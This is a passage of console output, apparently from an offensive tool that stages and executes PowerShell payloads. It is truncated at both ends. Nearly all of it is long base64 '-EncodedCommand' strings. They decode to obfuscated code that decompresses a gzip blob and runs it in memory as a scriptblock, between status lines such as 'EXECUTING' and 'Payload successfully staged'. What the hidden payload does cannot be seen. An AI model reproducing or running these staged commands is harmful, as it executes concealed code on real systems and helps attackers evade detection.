NQArAGUARQAvAE4AUABwADMANQBNAEwAZQBmAEYAdQBaAFQANwAvAHUAZgBQAC8AMQBkAHoANwB6AEgAYwBlADYAMQA4ADUATwAvAFgANQBSAGwAeQBxACsAZAA1ACcAKwAnACsAOABDAGUAVgBmAGcAZgB1AEgAKwBhAC8ANwBVAGgAMwBkAE0AUABMADgAWABhAFcANABmACsAcgB2AE8AMwB2AE8AegArADEAYQBaADkAbQBoADYAcgAvAEkAOABiAEgAdwA3AHQAUABVADUAYgBmAG4ARQBxAFoANgByAGQAdAA3AHMAdAB2AE8AcgA5ACsAYgB1AFIALwBKAG4AMABhAFIAOQA3AFkASQA2AFQAUAA1AGEAdABmAFkAZQB3AE4ATQBsAGUAUwBpACsAOABkAEQAdQA4AGUANABpAGYAUQA5AFkAbgA3AC8AMwBxAEwANABIAC8AbQA1AHgAaABWADAAYgA5AGoARQA5ADkAdABQAGcAagBmAFUANgBtAHYAOAB6ADcAegBKAEgATgA2AG4AUAByADEAMgBIADMAbgBkAGIANwBvAEsAOQBxAHMANQBkAFIAdQAnACsAJwByAC8AYwAvAEMAdwA3AC8AMwBEAHkAWQA2AHkALwBZADUAMQBDAFcANgBsAE8ASABzAHYAVgArAEMASABVADEAOQAnACsAJwBSAEgARgAwAEgAOAAwAGoAJwArACcANwBoAHYAZgA1AEoATQAyAHgANQB2AG4AcQB0ACcAKwAnAHoAUABQAFcANQA0AHIATAA1AE8AZQBjAGUAcgBuAE4AOQA0AGYAKwAvAHUAVwA0ACsAcwA5ADEAZwBZACsAeQBUAHcAVgB6AEUAZgA3ADUASgBlAGgAOQAzAHUAdABmAHEAbABmAHoAdQBFAEIAZwAvAGYAdgBmAHAATQA2ADgAYwB1AEYAKwBmADQATwArAGIAbgAzAG0AbQBYAGEAOQAwAHoANABYAGkAeAAvADcAdABxADkAUQArAEgAdgBqAGMAZQAwAGoAMQBXACsAegB0AGoARABwAHoAMwBSAEYAZgBJAFgAMwBsAGQANQBEAGgAcAB6AC8AcABKADUAZwBIAG0AQgAvAFEARgA3AFEAKwBhAHoAawBlAGYASABEAFgASwBuADgATwB7ADIAfQBoADkAeABQAE8ATwA4AGQAagBVAEwANwB2AGsALwB4ADkAWgBkAC8AeQBjAFgAOQBYAGQASAAwAFYALwBpADcAQwAnACsAJwAzAG8ARAA5AHUAdQBmAEQAeAB4AFMAWAA5AEYAMwBQADMAeAA5AHoAOQA3AE0AMwA4AG0AaABMAFgAeAB6ADQAKwA1AHIAegBJAEgAMABQAHEAdABMADMAbAB6AFIAJwArACcAWABlADMAOQBRAE0AbgBmAHAALwB4AC8AKwA4AFIAOABmAGwAcwBlAEgAWAB4AC8AKwA2AC8AOAB7ADEAfQBCAGEAYgAnACsAJwB3AFIANABFAGYAewAxAH0AewAxAH0AewAxAH0AewAwAH0AJwApAC0AZgAnAD0AJwAsACcAQQAnACwAJwBHACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] - Bytes remaining: 6204 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAewAxAH0ATwBIAFcAawBDAEEANABXAFkAUwAzAFAAYgB5AEIAVwBGAC8AMABwADIAVABxAHAAbQBvAFEAZgBsAE8ARgBPAFYAUgB7ADAAfQBNACcAKwAnAEUASAAwAE8AQgBkAEkAcwBFAE4AVwBBAHEAQwB4AEoAaQBZAEoAbQBTAGEARQBzAGUAdwBkAEsAdgB6AC8AbABPAHsAMQB9ADkAUgBrAEYAVwA5AFEAcAB2AHAAeABIACsAZQBlAGUAMgA3AC8ASwAzADkAOAB1AFgAdgBhAFAAegA1AHMASAAzAC8AOAArADkAZABmADUAOQAnACsAJwBzAGYAZgAvAHAAaAB1AFgANgA2AFcAMgAvAHUAdAAzAC8AOQBjAEsASgAvAFoAKwBQAFgAOABQAGwANgBNAFAALwA5AHcAeQA4ACcAKwAnAGYAdABpAEcAYgBoAFYARQBWAFYAagBHAGMAaABXAEUAVABWAGsAMwAyAEwAZQBSADEASwAnACsAJwBHAEwAMgBrAGQALwBYAE0AZgBzAFMATABqACsAJwArACcARgBlAFIATQB1ACsAUABzAG0AaABKAE8AUQA5ADgASQAwAFoAcgAwAHcANwBJAFYAdAB6AEwANgBHAHsAMAB9AFIAUABxAE4AdgBSAEMAWAArAHQARAA5AGgAVAA2AGQAZAB7ADEAfQAyADIAVwBzAFkAZgB7ADEAfQByAEwASgBoAHUASABmAGgARwBLAGsAUABYAFoAcAAzAE4ALwBoAEUARQBWAGIAagBoAG4AMABJAFMAcgBWAG4AOABmAHgASABEAGIAWgB1AGQAaABGAE0ASwBtADAAZQA5AEQANwAzADgATABvAHoATABFAEcATgA3AFkAdgAyADYAegBlAGUAagB2AFEAaAAxAGsAeAAyAEEAYwBZAGgATgBhADEAcAB7ADAAfQBCAE8ANABxAHcAagBOAGwAMwA3AHQAZAA1AHAAKwBHAHkARABwAE0AMgBQAEkAYgBMAFoALwBtAEQAdgBmAEkAdgBaAEIAUABzAFgANwBiAFoAUABmAGIAZABoAHUAdwBDAHYANgBZAGgAdQArAHIAKwBmAHgAcgB5AE4AcQB4AGEALwBHAC8AQwBiAGMAdwBlAE8ARgA5ADIAdgBvAFQAaABDAGYAYQBWAFgAJwArACcAaAA4ADUALwB6AGwATQBXADUAMAA3AGkAdQB4AC8ARABZAE0AZABkAHAAUgBoAFYASQBRAE4AOQB1AGIAUAAyAHEAZgAnACsAJwA0AEQAWABQADIAcgBiAEIANwBGAHIATQAvAHcAcQB7ADEAfQBPAE0ANQArADMAawAzADkAOAAyADMAQwBMAEgANABwAHoASABiAE4AbgA3AHAAdQBIADgASgBOAHoASgB2AGkAYgA3ADgATwAwAHkAewAwAH0AWgBoAEcARQBQACcAKwAnAGwALwBRAFgANwBGAGEAZQA5ADQAcAAzAHMAewAwAH0AMwB5AHIAbwA3ACsAagBaACsATAA3AGoAegBBAEkAJwArACcANQBPAHsAMAB9AFMAZQAyAE4ATAAzAG8AcQB3ADgATAA0AHkAWABMAE8AdgBUAHgANgB6AE4AdQBSAGoAeABUAHQAYgA0AG8AZgAyAHYAMgBDAGYAOAB0AHoAegAvAGkAYgA3AHoATABwAHAAJwArACcAbQAwAFgAdQBxAGMAbgBYAGMARQB3AGUALwB4ADcANgA0AC8AQwBmAHEASAB7ADAAfQA2AFQAMwBpAFEAdgB5AFgAKwBmAFEAegA1AEoALwBrAGoAUABKAEgAdgBxAEQAewAxAH0AcgAzAHQAZgA0AEoAegB4AE4AaQBiAC8AaQBJAEgALwBPAHcANwBBAGsAdgBrAC8ATwBTADUATwB0ACsAWAAyAE4AMwAzADMAcwAwAGIAawA2AGIAKwBsADcAYwB0ADEAegArAEkASgBQACsAJwArACcAMwArAEsAWABkAHMAMgB2AEkAYgBSAEMAWABGAFcAMwBtAEsANABOAHAANAAnACsAJwBDAGUARgAzAHgAWABjAHsAMAB9AHMAeAB3ADcAbAA4AHkAdgA1AHEAZgBCAFAANgA3AFQAKwBqAEsALwA4AGYAQQBKAEgAeQB1AE0ANQArAEYAWAArAFkAKwB7ADEAfQBIADgARABIAEYAMwBuAG4ASQA5AHUAUgBGACsAWAB2AG0AVwA3AGIAQwBsAC8AQwArAGIAcgBSAHUAdABFAHUANAA2AGsAZgA4AGIAcgBGAHYAeQBuADcARgA3ADUAcAA2AHcAagAvAHMAMQBIAHIAZAA5ADAAWQBlAEMAdgBBAG0AdQA2ACsAagBmAGwAZQBjAGgASgBlADUANgA2AGgAVgBYAHAAWABmAFQAYQBzADgANQA2ADYAbgB5AEwAcQBpACcAKwAnAFYAVgA2AFYASAArAEcANQB4ADMANwBkAE8AKwBGADMAMgBiAE0AbgBYAG0AVgBMAFgARQB0AHcAOABuAHMAWQBqAGMASABOAEMALwBsAFEAWABGAC8ASQAwAHkAcgBJAHYANQB3ADYAawBiACsASwBSADIAeQAnACsAJwB6AHIASwB1AGoAUwBKADEATQBBADMASABPAHMAUwAvAGwAbQBiAG8AUwAzAG0AYQBSAGUAaQBuAEkALwB3AGwAMgBIAHUASwBzAFAAQwB2ACsAegA4AEsAUgBjAEQANAB3AGYAbgB6AGUARgB2AHoASQBYADgAVgA3AFQARgAwAEkAcAArAGYATwBrAC8ARwA2AHsAMAB9ADUAeQB6AEcAKwBJAGsAbgBOADIARABXADUAMwBmAEgAbgBFADYAMwBQAFAAOQBoAHYALwBhAFAAeQBjAFAAcwBtAGYAcQAvAEUAYgA1ADAAeQAvAHgANAA0AHgANgBtAFYAUABuAEEAKwBLAG4AZQB0AFgANgBHAHQAdwBKAFgALwBNADIATQB5ADYAewAwAH0AUgAvADIALwBZAHQAMABYADYAcQBRADIAMwBtAHYAeQAxAEIASQBQADQAYwBJADgAcAB6AGgAOABkAGwANgA3AE8AdgBxAHQAVgBaAHcAdQBXAFoAYwB0AGoAbgBXAEUAbgArAEIAWAArAGQAaQA0AEwAewAxAH0ANwAxAFYAbwBRAGIANgBqAEgAbAA0AHoAbgBWAEUALwBIAEsAeQBkAE0ARgA4AFkAagB3AGsATwBKAFIATgB1AEMAUQBmAE8AaAA4ACsAYgBtADAASABUADEANAA2AEYAQQAvAEYAMwB4AHYAaQBiAHYAcwBYAHMAQQBYAHUAbQBmAFIASwB1ADcAQwA0AFEAdwBlADAAWAAyAHkATgA0AGMAWABGADgAUgBKAGMAZABIAGYAbgB6AG8AKwB1ADQATwBuAGEAdgB6AFIALwBRAGMALwB5AGoAYgBoAGUAMgBYADcAOQA3AEkARAArADMAZgB3AHgARgBmAHkATwBuAFYAOQBpADAAOABhACsAYQA5ADcAWgBQAGMAQQB2AE8AcwA4ADEAewAwACcAKwAnAH0AOQBCAGYAQgAvAE0AeAAwADAAMgA1AEIAegBWADYAMwBmAHMAbQBvAEMAZgB7ADEAfQBmAGkASQAvAEMAbgBQAFcANQAvAC8ASwBkAFMATgAvAEIAYgBQADYANQB3AGwAYwBhAC8AQQByAGUASwAzAGQAbAA3ADIANABLADkAdwBYAGIAawBlAGoAWQBQAHYAcgBKADkAVABUADcATABMAGQAVABlAGsASAByAFcAUAArAHsAMQB9AGkASgBoAHgAYgAyAFkAMAB3ADkAUABYAFEAOABXADQASABqAFoAewAwAH0AegB4AFcAbgBmADgAcgBOADgAZgB3AGYATQBzAGMARQA5AHsAMAB9AG4AVgBHAFgARABmAHgANgB5AHQALwBYADcAbQAvAGkAZgBlAE8AbwBwAHQANwBXAG4ARAAvAGgAZgBPAG8AaABwAFAAcABRAFgAVgAnACsAJwAzAHkAZABkADgAVAA3AHEANABiACcAKwAnACsAJwArACcAYQBzADgAYgBzAG0AZgA0AHEAQgAxAE8AMwBCAG8AUABLAG4AdQBDAHYAcgBhAGsASABYAHcAMwA1AGoANgBPAFMAZQAvADgAcQBOAGsAdgBmADUAKwAnACsAJwBDAGsANQB1ADYAUQA5ADkAOQA3AG4AegBqAHYAOQBjAHgAKwBaADEANwBTAHYASQBoACsASQBrAHUANAB4AFAAeABmAFcAVgBlAEoAVAB3AGoAUAB5AHMARwBuAEIAUAB2AFcATABQAG4AbgByAHIAZAAzADIAdQBNAE0AOAAyADUASwA4AGwAMwB4AFYANQBpAGQAaQBqAGQAUgBYADEAcQAzADAAYgB4ADIARgBQAEgATQAxAEQASgBmAFgAdgAvAGsAUwBmAHcAUwAvAHEAcgBLAEEAdgBqAEkAMQBQACsARgBsADEASgByAHkAZAB3AFMAdQB5AGYAMABDAGUAcgB6AGwASABmAFYASQA0AC8AYwBiACsAaQB2AHEARQBaADkAcgBFAHgANAByAC8AZAAvADUAZQBjAEEANwB4AHcAbwA2ACsAZQBlADAAZQBQAE8AagB2AFgAMQAwAC8AJwArACcAOABCAEwAMQAzADYAagArAFoAZQA4AGMAMwBHAHIALwBUAHsAMAB9AHoAMQBNAGIARwBPAEEASgAvAHkAYgA5AHsAMQB9AG0ASABoACsANgBUADMAeAAwAFAAewAxAH0ASgAyAG4AbABCAG4AWgAnACsAJwAxADIALwA2AFIARwB2AEIAZgBIAHIAawAyAGUAKwB0AHUAdgBKAHUAcwBiAHgAYQBzAEQAdABHAHoAaABXAC8AMwA3AEUAdgB5AGwANAB5ADAALwBBAFoAMgBXACsAdwBCAC8ARgBjAFkANQA5AHkAbgAvAE4AdQBmAHAAOQBDAFQANwBvAFkAOQBSAC8ANwBqADUANQB4AHYAMABiAGUATAB4AFAALwB1AEIAVAA3AEUAcAA2ADQAegBmADMAQwBlADgAYgA0AHYAZQBHAFAAcQBxADQATAA5AEYASgBxAHAAOAB0AGQAZAB1AEgAZgA1AFQAUABFAFgAYgBCADMAKwAnACsAJwBCAGIAOQA0AE4AdgA0AHEAaAB6AGIAdQBsAGoAaQBlAGQATwB1AGUAOABhAC8AYQBWADYAcwBiADUAUgBuAFIANwBxAHYAVwA2AFMANwByAG8ATwBTAFoAOABrADMAUwBIADgAdABjAG8AdgB1AEQASABmACcAKwAnAGoAOABWAGIAOQBGAGYAegBTAE0ASAA2AEcAagAyAG0AYwA4AFgAVABGADgAYQAvADgAUgB5AEoAbAArAEoAagBYAGIAewAwAH0AbQB6ADIAdgBXAEUANABjADIANgBhADQARgA5AGkAaQB1AGgALwAnACsAJwB0AFYANwA0AGMAKwBQAFQARwArAEcAdAB7ADAAfQBKAE8AcQAyAGwAWABzAGIAWQA4AFEAWgBQAHoAZgBCAFQATwBMAHQAQgBOAC8AeQBKAFoAKwBYAC8AWgAnACsAJwA5AFkAdgBiAGIAZAAxAFYAeQAvAGgASQBIAE4AZgBuAHQATwAvAGwAZQBlAFoAKwAwAFMASgBUAHQAcABoADcAOAAxADcAdgBMADgAYwA4AGEAUgA5ADcAegB4AEkAUABuAE4AdwArAEUAVABjAFYAKwA0AC8AMQBqAFgAZgB5AFAAUABNAE8AbgBYAEgAOQB3AHoANwBTADMAUwBBAGYAcQAvAEIAVwBSADkAZQBDAGUAYQBGAHQAZgBzADYAZgBDAEkAYwBEAHUAagBIAGkAaQBOADEAYgBoADAAMQBwAGoALwArAHAARAA5AFcATQBkAFYAeAA0AG8ATQAnACsAJwBHADMAdQAyAEIARgA1ADMAMwB7ADEAfQB6ADYAeQBhAEEAKwA4AEQAOAA5AEYANABuAHAASAAvAFMAdgB1AGUAOQBaAFAANABUAFAAeAB5AHQAUgAyAGwAKwBUADUASgAzAGwAZQAyAGwALwAzAHAANwB1AHsAMAB9AE4AMwAnACsAJwBpAG0AMQBmADYAawBsADcAYgB3ACsAaABDAGQAJwArACcAcQAzADQAcgBQAE4AKwBHAHAASgBQAEUANAAxAFAAaQB0AFMAWQBQADgAawBmADMANwBhAGsARAByAGYAdQBUAEgAZQBiAEIARgAvAEkAKwBaAFgAOABmAC8AWgByAHcAcgBuADUAMQBaAGwAMABQAEgAOABoACsAOQBkAHsAMAAnACsAJwB9AGIAKwBzAFMANgBTAGYAVgBWAG0AUgBkAFAAVwBHAGUAZQByAGQASAA3ADYAbgBkAFQAOQA1AHUAYwBQAEQAMgBBAHIANwBWADEAbwAzAEgAbwBQAG0ASgA5AGsAdQBMADcAbgByAC8AYwBmAFQAbQB5ADMAcgBpAEIAQgB3AFAANgBvAFMASQB1ADkAbQBQAFIASABOAGYAZgB3ADgATgByADcATQBQAGYAUgBuAEUAUwBUADIAMQBDADAAcgBtAGwAZAB7ADAAfQBsAGsAMwArAHMANwBIACsAUgA4ACsANQB4ADMAaABiADUASAAxADYATgBYAFAASAArAHsAMQB9AFkAegB2ADgAeQBJADQASgAvAFYARAB4AGoAZQB7ADEAfQB5ADkAZgBkACcAKwAnAGoAZgBsACcAKwAnAHYATwBHAHoATQBuADkAYQB3AGYAcgBHACcAKwAnAE4AegA4AEwATQBuAFgAaABQAGoAdgBDAEwAdgBGACsANABUAG4AbABPAHMATgAxADEALwBFADMAaQBSAE8AYwBxADYASQB5AGUAdgBEADkAWgBYAGoAZgB4AFgALwBwAFoASABYAFoARAAwAG4AYwA3AE4AaQBkAE4AVgBtADMAQgA0AFEALwA1AEgANwB0AE8AUABIAGYAOQAvAFkAZAAzAGsAaQBLAHYARQB6AC8ATABqAHcAWAB6AHoASABxACsAUAArAEgAOQBOAHYAbABOAGQAKwA5AHcAWgAvAFYAUgA4AHMAbwBoAEoAbAAyADgAYwBmADMAQwBiADgAcgBZAGwAYgA2AE0AcQAyAGEAMwA5AEIAeAAyAG8AYwAzADQAUwAxADcAbgByAG8AcQBBAC8AdQBrADQAWAA2AEEAQgA0AEMALwA0AGMAMQBJAG4AUABaAE0AZQBHAHUAaABJAC8AVgB1ADUATABQAFgAagBvADEAUAB3AEwAdgB5AFMAOQBkAE8AZgA2AE0AMgA1AGIAZQBPAG4AUwBmAGMAagAxAHQAQQBNAEgARwBmADUAYgBYADgAaQB1AGQALwAyAEUAVABpAHEATwArAGEAbQB0AHcAOAB6AHIASgBmAEgAewAwAH0AMwBIAGoAdwAvAHcANQA4ADMANABTAEUAdgB5ADEAegBpAE4AYQBwAEgAbQA0ADQAZAA5AEcAawBQAHIAcABDAHIAMABxAFgAUgBQAGIAcgAnACsAJwAvAEsAWAByAHYATwBqADYAUgBBACsAOAAvAHoAUwBmAHsAMAB9AGEALwBhAFoAMQA0ADkAOABrADYAVgA0AGkANwBjAEwAYQBoAFgAeABkAFYAegB4AG8ASABuADAAbgB4ADQAaABsAC8AUgB2AFAAagBNADMAUABmAFcAegBXAGwATAA0AHUAbAArAHEAWABpAHUATwBFAGUAOABMAGIANABiAGUAdQA0AEEATAB3AFAAWAA3AFcAZgB1AHUAVwBWAGUASABWAGsASABQAEkAQQBqAHoAMQArADYAOQB4AGIAOQBQAEgAQwArAGMAdgBPAHcANQA5AEYAOQBtAHAAZQBaAFMAOQBvADAAWgA4ADIAcwArAC8AZgBFADgAYQB2ADcAdgBQAHQAeABDAFoANwBYADQARgBGADUAdABaADQALwB4AEgAVgArAHgARgBIAGkALwAyAHYAcgA4AEEAewAxAH0ATwA3AHYAaQB1ADAATABuAE0AQwAnACsAJwA3AFoAegBUADEANQBuADMASABPAEQAUABoADUAWQBMADUAMQBiAHQAMwBUAG4AegBUAHAAKwBuADYATwBMAGsAagAvAFcAcQBWAE8ALwBBAHcAVAAwAHsAMQB9AFAAbAAnACsAJwBoADAAYQBSADUAUwBuADQATgB6AEEAYwBkAC8AewAxAH0ANwBmAHsAMQB9AHIAawBJAFAAawBIADMAcABiADcAWAA4AHgAegBtAHUATwB6AG8ATQAyAGYANABzAFkARQBuAGQAUAAvAEcAYwAnACsAJwA5AEEAWQBYAHYAQwA1AGMAKwBiAEcAZgBrACcAKwAnAHoANgBXAEwAdwAnACsAJwAvAFkAZQA0AFQAZgB5ADMAYQBOAEIAZAA2ADcAbwBKAHYAagBZADgAJwArACcAZABPAHQALwB6AGsAZQB2AE8ATwBNAEEAdgB6ADIAbAAvAHsAMQB9AEoATQA1AC8AVgBQADkAcABlADcAbQAzAHsAMQB9AEwALwBGAE0AOQBOAGsALwBUAHcAaQBuADcARABuAEEAcAB2ADYAcAA0AHkASgBCAHoATQBxAEQALwBsAHcAWAB3AHoAOQBPACsASABlAHIAWgBlAEwATwBEAG4AawBmAEYAMgAwAGYASABPADIAVABGAGUANQAnACsAJwBLAHMAOQA0AHYAdwBpAHYAUwBNAFEAUAA4AGUAMQAxACsASABoAEQAbgBzAFcAMQBPAHUAewAxAH0AMAAvAC8AMABwAC8AKwBaAFEAMgByAHcAZQBNAG8AOQBOAHgAMgBQAFQAagB1ACsAMwBKAEEAdgBkAEQAVgA2AGMAKwBoADUAMAB2AHIAQwBPAG8AWAAzAEgAUABLAGgAZQBCAFgAWQBxAHoAdwBjACsAcQAvAHcAOABOAHIAMQA5AFQATgA0AGMAawB2AGYARwBCADMAMABRAHQAZAAvADYARQAvAG8ANQBLAFQAWABuADcAaAAvADUAZgB4AHEASABpAEoATwA3AEUAYwBmAGEATgAzAGMALwBZAG0AKwBoAEIANwBNAHMAZQBjAHgAOQBaAGYAagBlAFYAKwBKADcAOQBKADYAYQB7ADAAfQB3AGQAUgB1AHMAOQA2AGkASAAvAGwATwAnACsAJwBZAGkANABWAHkANABjAEYAKwBvAG0ANABTADMATABYAGoAbgB2AFkAQQArAE8AdgBEADgAKwBKAEwAaQBrAFoAMgBrAGUAUgB0AGMAMgAvADgAZgA4AEYAcgBoAHUAcQAvAFMAdQA1AFgAOABYAGMAWABFAHQANQBNADIAdgBYAHQANQB2AGwAVgArAHIAYQBOAFMAMwBqAHcAbgB6AEcATABTAHQAWgA1AG4AaABtAFYAWAA1AHkASABWAEIAMwBxADMAdQA2AGMATQBLAFMANwBIADkAdwAzAFAAYQAvAEEAQgBQAEQAdgB1ADEAcAB1AEgAMQB2AHgAZQB1AEIAKwBOAHEAWgBOAGwAMQA4ACsAagBlAFEAMgBlAHQAcAA0AFQAUAA4AEQATABuAGkAZAB5ADkATwBJADcAWABxAFEASABhACsAdABYADYAdwB2AHIAagBMAHAANwBqAHoARQBPADAATwBYAEUAWQB7ADAAfQBUAGYAQwBPADYAegBNACsAdQBEAEYAdAA0AGUAWQBPAGMARQBIAFQAUwBxAHUALwBlAEkAWABqAGMAbgBNAHYAKwBqAFQAOQBBAHoANgBCAFAAbQBJADgAVgBQAGYATAA1AHMAeABiAHQAKwBiADkAUQA4AEkAagA5AFMAMwB5ADgANgBQAFYATwBoAG4AMQB4ADMARwArAHIATwAvAGYARgBvADcAMwBuADMASAByAFAAcgAzAHIAVwBlADQASgBjADEATwBrAEgAbgBMAEYAegAzAEYAZgBtAC8AUQBFACsAdgA2AEkAZgBXADEAOQBTADMAMwA3AEUAZQBxAGYATwBTAGUAYwBiAHYAYwBKAG4AbgBXAE8AcwAxADIAYgBXAHcASABqADcARQBPAFkATAB6AE0AZgB3ADYAWQAvAC8ASQBlAHYAcQBzADAAegBIACsAVgBsAEYAeABTAHUAOABBAHYAdgAvAEsAKwBpAEMAQwBKAC8AZQBQAHEAZQBmAGoAQgB2AHYAdQB1ADcAcQA5AHMATQA3AEMAUAB0ADUASgAwAEUAUAA5AHIAaQA1ADAAVAB7ADEAfQBYACsANQBmAGUAQwBkADYAWABMAFQAOQAzADgAWAA3AC8AegBwAHUAZAB6ADQALwBIAEYAZgBNAGoANgBGAFAAOAA3ADQANABGADYATwA3ADQAZgArAEQAMAByAGgAMgBkAHIAOQAwAG4AUABEAGMAYgBiAEEAdgB3AHAANwB5AFgAMQBMAGoAdABxADcAaAB1AGgATQA5AEkAOABOAE8AVwBlAFkAZQB6AHMAUgBkAGMAdwBEADEAVABvAHMAbgB1AC8AMAAzAFgANQAzAEwAVABKAHoAaAB2AFgARAArADgAMgBpAGsAKwAvADYAZQBaAEsAOQA1AE4AdgBhAFcANgBUAFgAZQBrADkAeABmAFgAbwBmAGoATwBFAFYAKwBHAFoASAByAHgAegBrAHYAUQBtAE8AcAB6ADUAaAB6AGgARQBlAE8AZQBCADkAWgBYADcAcwBOACsASgAzAHIAcgA3AHIAZABjAHIAKwBIAGgAawAvAGYAYgBTAHoAYgBmAFcANwBjAHUAWQAzAHUAdgBTAHYARwB3ACsAUABXAEgAOQBGAGUAOQBrAHYATQBOAFEAeAA0AHAAegB7ADEAfQBlADUAVAAzADEAcgBEAC8ALwBRAE4AbgAyAE4AYwA3AEoAewAxAH0AYgAnACsAJwBoAE8ALwBNAC8AVAAwAHcAcAA2AHEAdQBZAHYAaQBCADMAZQBJADMALwAvADgASwAvAFoAcgB2ACsAUAArAHoANQB3ADMAcgBqAFIAMwByAHYAdgBHADkAQwB0AG0ARwBPAHQAaABpAHQALwBHAG8AZQB5AC8AVgA5ACsAQwB6AFMAKwBzAEEAdgB5AHYAWAA3AG8ATQBsADgAVAB7ADAAfQAnACsAJwBPAE4ALwBTAEIALwAvAGQAMwA1AFcAbABqAEgAVgBHAEcAMwAyAE8AUQAzAC8AYgAvAG4AagByAGEANABOAC8ASQBkAFgAMwB2AHUAYgBaAE4AOQBzAGkAdQBQACsARABwAEYAZQAvADUAaQBiADgAOQBaADIAeQBvACsAOAB2AG0AYQBQAGMASwBIAHUAVwBkAHYAdwAyAE4ANQA3AHUAWQBMAGUAQwBGAEIAZQAvAGYAQQA3ADkARAB0AC8AdwArAGEAOABNAC8AUAAvAHoAeQBsAHcALwBsADgALwBiAHAAdwA5AC8AKwBDADgAWQBaAEQAUABWADkARwBBAEEAQQAnACkALQBmACcAVQAnACwAJwBnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAZwBPAEgAVwBrAEMAQQA0ACcAKwAnADIATwBRAFEAdQBDAFEAQgBTAEUALwAwAHEASABEAFoAWABTAFUAMwBRAHcATwBsAFIAbwBlAEMAcgBhAGoARQBBAGkAMQAnACsAJwBCADcAdABwAHIANgBOADMAVQBXAFUANwBMACsAMwBVAGsASABIADMAbQBsADQATQAzAHcAegBTAFkAQQAxAGwAdwBJAHIAUQBIADMAeQAvAFQAWABvAG4AOABjAGgAbABUAHoATgBTAGwAQwAyAEYAUwB1AFEAbAB1AE0AVgAwAEsAcQBPAFEAZwBtADUAZABxAG0AVwBIAEsAKwBEAHEARgAnACsAJwAxAHMAZAB5AEUAOQBkAGwAUgBJADcAVwA2AHkAbQAvAEcANgA0AFkATQB3AE4AcABvAG4ALwA5AEIAdABjAGgANQAvACsATQA5AFoAaABMAFUAbwB3AEEAMgBhAHUAdwBTAGwAdQBNAEEAQgBzAFkAbQBkADcASwBIAFIAWABvAEMANQB1AEoAaABLAFEANABxAFIARwB3ADIAZQBJAHsAMgB9ADUAbgA5AEsARwBWAHcAQgBwAGsAWAB4AFIASwBVAFMAMQBUAEIAZAB7ADAAfQBKADEAMgBYAE0ANgBlADgARgB4ADUATABEAHoAKwA4AEEAQQBBAEEAewAxAH0AJwApAC0AZgAnAFAAJwAsACcAPQAnACwAJwBiACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAZwBPAEgAVwBrAEMAQQA0ACcAKwAnADIATwBRAFEAdQBDAFEAQgBTAEUALwAwAHEASABEAFoAWABTAFUAMwBRAHcATwBsAFIAbwBlAE